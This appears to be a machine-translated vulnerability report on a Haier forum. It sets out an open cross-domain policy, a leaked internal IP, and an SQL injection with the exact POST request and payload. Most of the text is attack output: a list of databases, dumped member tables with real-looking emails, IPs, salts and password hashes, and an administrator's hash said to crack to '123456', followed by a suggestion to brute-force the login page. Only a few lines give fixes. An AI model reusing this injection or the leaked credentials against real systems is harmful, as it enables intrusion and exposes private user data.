Haier Forum SQL injection leakage member information can be modified UC administrator information and solutions
SQL Injection, DZ Forum
Data at least 2 W
Trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]
0. The target site is tbbs.haier.com. This forum is different from bbs.haier.com.
1. First let's take a small hole in crossdomain. xml file.
Http://tbbs.haier.com/crossdomain.xml
<cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>
2. Internal IP address leakage links
Http://tbbs.haier.com/HaierBBS/test.jsp
10.135.103.22 IP:
Management Platform
Http://tbbs.haier.com/was5/web/login.jsp
3. SQL Injection Vulnerability
Add a level during injection
POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1Content-Length: 46Content-Type: application/x-www-form-urlencodedReferer: http://tbbs.haier.com/Cookie: JSESSIONID=C508D821EE8E5CC4B133E91E9FF5D81D.jvm1; idsALUserSource=""Host: tbbs.haier.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*sourceId=1'%22&type=1%2C5%2C6%2C7%2C8%2C9%2C10
22 Databases
[*] confluence[*] confluence2[*] confluence3[*] confluence4[*] discuz0719[*] discuz15[*] gitlabhq_development[*] gitlabhq_production[*] gitlabhq_test[*] information_schema[*] logbak[*] mysql[*] performance_schema[*] test[*] trswcmcluster[*] trswcmcluster0830[*] trswcmclustercn[*] trswcmv65clusterforcn0410[*] trswcmv65clusterforen[*] trswcmv65clusterforen1025[*] trswcmv65clusterforen20131114[*] trswcmv65plugins
Leakage of member information, including user name, password, salt, email, and mobile phone
Trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]
E.g.
back-end DBMS: MySQL 5.0Database: discuz15Table: uc_members[8326 entries]+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+| uid | myid | myidkey | salt | babao | regip | email | secques | regdate | username | password | lastloginip | lastlogintime |+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+| 1 | <blank> | <blank> | 170560 | NULL | 114.245.229.254 | admin@mocard.tv | <blank> | 1259818150 | admin | e6dbb8e9474d11bd3697ba769a18f204 | 0 | 0 || 2 | <blank> | <blank> | 63b267 | NULL | 114.245.229.254 | kllm868@163.com | <blank> | 1259818742 | kllm868 | bd4c0638b9e9cea498aeae9684ce3112 | 0 | 0 || 8 | <blank> | <blank> | abff79 | NULL | 114.245.231.251 | 2507248571111@qq.com | <blank> | 1259985674 | #aqa | 7beb4aed0685006f808f51ce537ec55a | 0 | 0 || 10 | <blank> | <blank> | 038643 | NULL | 218.58.70.250 | wxn_summer520@163.com | <blank> | 1259992864 | \xe8??\xe9\xbb? | a2adcc48ade4bf6c24e1510aa26f0ea3 | 0 | 0 || 15 | <blank> | <blank> | 3ac3b3 | NULL | 210.5.133.19 | 94172070@qq.com | <blank> | 1260006611 | s520 | 5c68c562eaa0c48a54f0b587c1c8af7a | 0 | 0 || 16 | <blank> | <blank> | 8712f0 | NULL | 114.245.231.251 | 4698642882w2w@qq.com | <blank> | 1260009400 | 2w2w2w | b5c32024ea7e703a4ac90536dbc381a7 | 0 | 0 |
4. Modify the UC administrator Information
Obtain the Administrator information of trs_ucenter_members_admin through the injection vulnerability.
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+| uid | myid | myidkey | salt | regip | email | avatar | secques | regdate | username | password | lastloginip | lastlogintime |+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+| 173356 | <blank> | <blank> | b351e0 | 10.135.103.22 | kiraqing@vip.qq.com | NULL | <blank> | 1353657771 | lhtww | 935af859a07284299ed775479542ff1f | 0 | 0 |+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
Although the password is added to salt, the password 123456 can still be cracked.
You can change the information, bind your mobile phone, change your mailbox, and so on.
VIPuser
5. Blasting
Http://tuser.haier.com/ids/cn/haier_login.jsp? ReturnUrl = http://tuser.haier.com/HaierFramework/haier/appuser/vipUser/myhaier.jsp
If the UC administrator password is 123456, other people may also be 123456.
Proof of vulnerability:
Solution:
1. filter special characters
2. Access Restrictions on the administrator interface
3. Enhance the password (estimated)